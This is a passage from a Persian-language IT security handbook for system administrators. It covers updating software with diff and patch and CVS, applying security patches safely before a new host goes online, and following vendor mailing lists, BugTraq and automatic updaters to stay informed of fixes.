diffﺍﺳﺖ؛ ﻓﺎﻳﻠﻲ ﻛﻪ ﺷﺮﺡ ﻣﻲﺩﻫﺪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ ﺧﻄﻮﻁ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ،ﭘﺎﻙ ﺷﻮﻧﺪ ،ﻳﺎ ﺑﻪ ﺁﻥ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ
ﺗﻮﻟﻴﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﻣﻨﺠﺮ ﺷﻮﺩ .ﺑﺮﻧﺎﻣﻪ diffﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ ،ﻭ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺣﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬﺎ ﺑﻪ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺍﺳﺖ ﺗـﺎ ﺑـﺎ
ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ،ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﺷﻮﺩ .ﺑﻌﺪ ﺍﺯ ﺍﺻﻼﺡ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺗﺮﺟﻤﻪ ﻛﺮﺩﻩ ﻭ ﺁﻧﺮﺍ
ﻣﺠﺪﺩﹰﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﺪ.
٣٠٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
CVS
١١١
ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ،ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﮐﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣـﺘﻦ
ﺑﺮﻧﺎﻣﻪ ﻣﺜﻞ ﺳﻴﺴﺘﻢ ﻧﺴﺨﻪﻫﺎﻱ ﻫﻤﺰﻣﺎﻥ ) ١١٢،(CVSﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻥ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ
ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ .ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﺧﺮﻳﻦ ﺑﺮﻭﻧﺪﺍﺩ ﺑﻪﺭﻭﺯ ﻛﻨﻨﺪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻧﻬﺎﻳﻲ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺍﺻﻼﺡﺷـﺪﻩ
ﺍﺯ ﺑﺮﻧﺎﻣﻪ CVSﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﺘﻦ ﺑﻪﺭﻭﺯ ﺩﺭﺁﻣﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺟﻤﻪ ﻭ ﻧﺼﺐ ﺷﻮﺩ.
،NetBSD ،FreeBSDﻭ OpenBSDﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺮﻛﺰﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺧـﻮﺩ ﺍﺯ CVSﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ CVSﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨﻨـﺪ ﻳـﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ
ﻣﺜﻞ sourceforge.netﻛﻪ ﻣﺨﺎﺯﻥ CVSﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺮﺟـﻊ ﺧـﻮﺏ CVSﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﻛﺘـﺎﺏ
"ﺿﺮﻭﺭﻳﺎﺕ (Essential CVS) "CVSﺍﺷﺎﺭﻩ ﮐﺮﺩ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﺍﺳﺖ.
ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ
ﻲ ﺁﺷﻜﺎﺭ
ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﺷﻮﺩ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻭﺻﻠﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻤﺎﻡ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘ ﹺ
ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ .ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻓﺮﺍﮔﻴـﺮﻱ
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺯﻩ ﻛﺸﻒﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﮔﻮﺵ ﺑﻪ ﺯﻧﮓ ﺑﺎﺷﻴﺪ ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺻﻼﺡﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ ﺁﻧﻬﺎ
ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ.
ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺎﺯﻩ ﻧﺼﺐ ﺷﺪﻩ downloadﻛﺮﺩﻥ ﺍﺻﻼﺡﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮ ﻭ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ
ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺁﺧﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺍﻳﻤﻨﻲ ﺑﻪﺭﻭﺯ ﺷﺪﻩ )ﻣﺜ ﹰﻼ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ Macﻳﺎ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﻛﻪ ﻫﻴﭻ ﺧﺪﻣﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺍﺭﺍﺋﻪ ﻧﻤـﻲﻛﻨـﺪ(.
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﻣﻮﺭﺩ ﺑﺤﺚ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻳﻜﺒﺎﺭ downloadﺷﺪﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺩﻳﺴﮏ ﻓﺸﺮﺩﻩ ﻣﻨﺘﻘﻞ ﻛﺮﺩ ﻳﺎ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ
ﻳﻚ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺮﺩ ﻭ ﺍﻋﻤﺎﻝ ﻧﻤﻮﺩ .ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﻣﻨﺎﺳـﺐ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ ﭼﻨـﺪﻳﻦ ﺭﺍﻳﺎﻧـﻪ ﺩﺍﺭﻳـﺪ ﻛـﻪ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﺷﺪﻥ ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎ downloadﻛﺮﺩﻥ ﭼﻨﺪﺑﺎﺭﺓ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎ ﺍﺗـﺼﺎﻝ ﺷـﺒﻜﻪ ﺭﺍ ﻛﻨـﺪ
ﻣﻲﻛﻨﻨﺪ .ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ ﻭ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺭﻭﻱ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﮏ ﻓﺸﺮﺩﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨـﺪ .ﺑـﺮﺍﻱ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ ،ﭘﺎﻳﮕﺎﻩ ﻭﺏ WindowsUpdate Catalogﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻗﺎﺑﻞ downloadﺭﺍ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ
ﺍﺳﺖ.
ﺍﮔﺮ ﻫﻴﭻ ﻣﻴﺰﺑﺎﻥ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻳﺎ ﻣﻨﺎﺳﺐ ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺖ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺷﻮﺩ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜـﻪ ﺍﺻـﻼﺣﺎﺕ
ﺍﻋﻤﺎﻝ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﻤﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﻛﻨﻴـﺪ ،ﻭ ﺗـﺎ ﺣـﺪ
ﺍﻣﻜﺎﻥ ﺯﻣﺎﻥ ﺍﺗﺼﺎﻝ ﺭﺍ ﻛﻮﺗﺎﻩ ﻧﻤﺎﻳﻴﺪ -ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﻛﻪ ﺍﺻﻼﺡﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ downloadﺷﻮﻧﺪ -ﻭ ﺳﭙﺲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺻـﻼﺡﻫـﺎ
ﺩﺭﺣﺎﻝ ﻧﺼﺐ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺷﺒﻜﻪ ﺟﺪﺍ ﺳﺎﺯﻳﺪ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺗﺼﺎﻝ ﺩﺳـﺘﮕﺎﻩ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ
ﺁﺗﺶ Statefulﻳﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺗﺮﺟﻤﺔ ﻣﻲﻛﻨﺪ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻤﻦﺗﺮ ﻫﻢ ﺑﺸﻮﺩ ،ﺑﮕﻮﻧﻪﺍﻱ ﻛـﻪ ﺗﻨﻬـﺎ
ﺑﺴﺘﻪﻫﺎﻳﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺑﺮﺳﻨﺪ ﮐﻪ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﺗﺼﺎﻟﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺷﺮﻭﻉ ﺷﺪﻩ ﺍﺳﺖ.
ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﻧﻤﻲﺩﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩﺍﻳﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﻳﻚ ﺟـﺰﺀ ﻣﻬـﻢ ﻓﺮﺁﻳﻨـﺪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ،ﻛـﺸﻒ ﻭ
ﻻ ﺍﺯ
ﺭﺩﻳﺎﺑﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪﻱ ﺍﺳﺖ ﻛﻪ ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ .ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﻣﻌﻤـﻮ ﹰ
ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﭼﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺳﺎﺱ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑـﺮ
ﻻ ﺑﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻫﻤﺔ ﻣﺘﻨﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺼﺐ ﺷﺪﻩ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻭﺍﺣﺪ -ﻛﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ
ﻣﺘﻦ ﻣﻌﻤﻮ ﹰ
-ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ.
111 Versioning Systems
112 Concurrent Versioning System
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٠٣
ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﺻﻼﺡﻫﺎ
ﭼﻨﺪ ﻣﻄﻠﺐ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺻﻼﺡﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
•
ﺍﻧﻮﺍﻉ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﻭ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺻﻠﻲ ﻣﺜﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺍﻋـﻼﻡ ﺍﻧﺘـﺸﺎﺭ
ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺩﺍﺭﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻫﺴﺘﻨﺪ .ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺑﻮﻟﺘﻨﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻛـﺰ
ﭘﺮﻭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ ) .(http://register.microsoft.com/regsys/pic.aspﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑـﺮﺍﻱ
ﺍﻋﻼﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﻣﺠﺰﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻧﺎﻡﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ.
•
ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺨﺘﻠﻔﻲ ﻣﺎﻧﻨـﺪ BugTraqﻭ NT-BugTraqﺍﺧﻄﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ
ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻧﺎﻡﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺣﺎﻟﺖ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻣﻬﺎﻱ ﺧﻼﺻﻪ( ﻭ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ.
•
ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ ﻣـﺮﺗﺒﻂ
ﺑﺎ Usenetﭘﺴﺖ ﻣﻲﻛﻨﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺑﻨﺎﻡ BINDﺩﺭ comp.protocols.dns.bindﻣﻲﺁﻳﺪ( .ﺑﻄﻮﺭ ﻣـﻨﻈﻢ
ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ﺳﺮ ﺑﺰﻧﻴﺪ.
•
ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﺓ ﺷﻤﺎ ﺩﻳﺴﮏ ﻓﺸﺮﺩﺓ ﺣﺎﻭﻱ ﺍﺻﻼﺡﻫﺎ ﺭﺍ ﺗﻮﺯﻳﻊ ﻣﻲﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﮔﺮﭼﻪ ﺍﻳـﻦ ﺩﻳـﺴﮑﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺍﺻﻼﺡﻫﺎﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﺎ ﻫﻤﺎﻥ ﻟﺤﻈﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻧﻜﻨﻨﺪ ،ﺍﻣﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ ﭼﻮﻥ ﺗﻌﺪﺍﺩ ﺍﺻﻼﺡﻫـﺎﻳﻲ
ﻛﻪ ﺑﺎﻳﺪ downloadﺷﻮﻧﺪ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺯﻳﺎﺩﻱ ﻛﻨﻨﺪ.
•
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺧﻮﺩﻛﺎﺭ ،ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺭﺍ ﺑـﺎ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺩﺳـﺘﺮﺱ ﺭﻭﻱ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﻓﺮﻭﺷﻨﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﺑﺴﺘﻪﺑﻨﺪﻱ ﺑـﻪﺭﻭﺯ ﻧﻴـﺴﺖ .ﺑﻴـﺸﺘﺮ ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﮕﻮﻧـﻪﺍﻱ
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺭﺗﻘﺎ ﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ downloadﻭ ﻧﺼﺐ ﻛﻨﻨﺪ .ﺍﮔﺮ ﺷﻤﺎ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺑـﺮﺍﻱ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻗﺒﻠﻲ
ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ.
•
ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺍﻱ ﻧﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﺭﺳـﻲ
ﻛﻨﻴﺪ.
Downloadﻭ ﺑﺮﺭﺳﻲ ﺍﺻﻼﺡﻫﺎ
